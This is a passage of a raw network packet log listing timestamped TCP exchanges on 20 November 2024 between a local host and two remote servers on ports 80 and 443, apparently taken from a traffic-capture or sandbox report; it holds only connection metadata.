                                                                                                            Nov 20, 2024 16:58:12.878622055 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.878804922 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.878869057 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.880043983 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.880168915 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.880234003 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.881453037 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.881613970 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.881665945 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.882899046 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.883366108 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.883424044 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.884366989 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.884583950 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.884650946 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.885776043 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.885858059 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.885909081 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.887181997 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.887337923 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.887393951 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.888694048 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.888951063 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.889004946 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.890147924 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.890413046 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.890465021 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.891520977 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.891875982 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.891927958 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.892997980 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.893178940 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.893232107 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.894491911 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.894723892 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.894772053 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.895842075 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.897283077 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.897342920 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.897387981 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.897496939 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.897543907 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.898746967 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.898835897 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.898894072 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.900170088 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.900816917 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.900878906 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.901623011 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.901760101 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.901813984 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.903063059 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.904181004 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.904243946 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.904501915 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.904592991 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.904644012 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.906018019 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.906209946 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.906260014 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.907681942 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.907833099 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.907887936 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.908809900 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.908957958 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.909008980 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.910228014 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.910283089 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.910337925 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.949918985 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.950083017 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.950118065 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.953238964 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.953361988 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.953382015 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.956901073 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.956971884 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.956985950 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.960043907 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.960118055 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.960131884 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.963887930 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.963946104 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.963964939 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.966823101 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.966881990 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.966896057 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.969886065 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.969940901 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.969954014 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.972661972 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.972732067 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.972748041 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.974570036 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.974633932 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.974647999 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.978148937 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.978209019 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.978225946 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.981674910 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.981761932 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.981775999 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.985048056 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.985295057 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.985310078 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.988038063 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.988101006 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.988116980 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.991198063 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.991275072 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.991287947 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.995033026 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.995088100 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.995100975 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.998008966 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.998061895 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.998075962 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.015376091 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.015603065 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.015789986 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.015917063 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.016244888 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.016324043 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.017196894 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.017441034 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.017484903 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.018476009 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.018635988 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.018692017 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.019776106 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.020059109 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.020103931 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.021101952 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.021173000 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.021214008 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.022208929 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.022382021 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.022423029 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.023534060 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.023570061 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.023612022 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.024650097 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.025692940 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.025758982 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.025854111 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.025983095 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.026032925 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.027056932 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.027443886 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.027503967 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.028223991 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.028695107 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.028753996 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.029453993 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.029561996 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.029618979 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.030550957 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.030683994 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.030735016 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.031723022 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.031985044 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.032040119 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.033054113 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.033263922 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.033320904 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.033963919 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.034459114 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.034516096 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.035187006 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.035679102 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.035738945 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.036180973 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.036322117 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.036371946 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.037286043 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.037379980 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.037431955 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.038405895 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.038794041 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.038861036 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.039570093 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.039623976 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.039680004 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.040636063 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.040817022 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.040874004 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.041759014 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.041811943 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.041863918 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.042885065 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.043010950 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.043066025 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.043992996 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.044312954 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.044368982 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.045129061 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.045260906 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.045315027 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.046328068 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.046372890 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.046428919 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.047503948 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.047574997 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.047631025 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.048470974 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.048614979 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.048669100 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.049704075 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.049860001 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.049916029 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.050693989 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.051019907 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.051074982 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.051879883 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.052318096 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.052373886 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.052973032 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.053141117 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.053196907 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.054083109 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.054673910 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.054730892 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.055236101 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.055247068 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.055303097 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.056317091 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.056401968 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.056458950 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.057467937 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.057698011 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.057758093 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.058562040 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.059204102 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.059261084 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.059724092 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.059859037 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.059912920 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.061692953 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.061734915 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.061928988 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.061975002 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.062067986 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.062128067 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.063061953 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.063273907 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.063328981 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.064228058 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.064254999 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.064311028 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.069828987 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.069860935 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.069892883 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.069921017 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.069937944 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.069953918 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.070110083 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.070987940 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.071454048 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.071527958 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.072025061 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.072454929 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.072520971 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.073349953 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.073519945 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.073576927 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.074400902 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.074556112 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.074616909 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.075566053 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.075731039 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.075788021 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.076674938 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.076800108 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.076860905 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.077584982 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.149307013 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.149410963 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.149439096 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.152323961 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.152358055 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.152379036 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.152395964 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.152415037 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.152426004 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.152453899 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.152460098 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.156218052 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.156263113 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.156289101 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.156306028 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.156320095 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.159302950 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.159348965 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.159374952 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.159392118 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.159426928 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.162590027 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.162611008 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.162656069 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.162671089 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.166043043 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.166109085 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.166121960 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.169573069 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.169641018 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.169653893 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.173012018 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.173083067 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.173094988 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.175966024 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.176028013 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.176042080 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.179502010 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.179562092 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.179574013 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.182632923 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.182689905 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.182703018 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.186511993 CET44349174142.215.209.78192.168.2.22
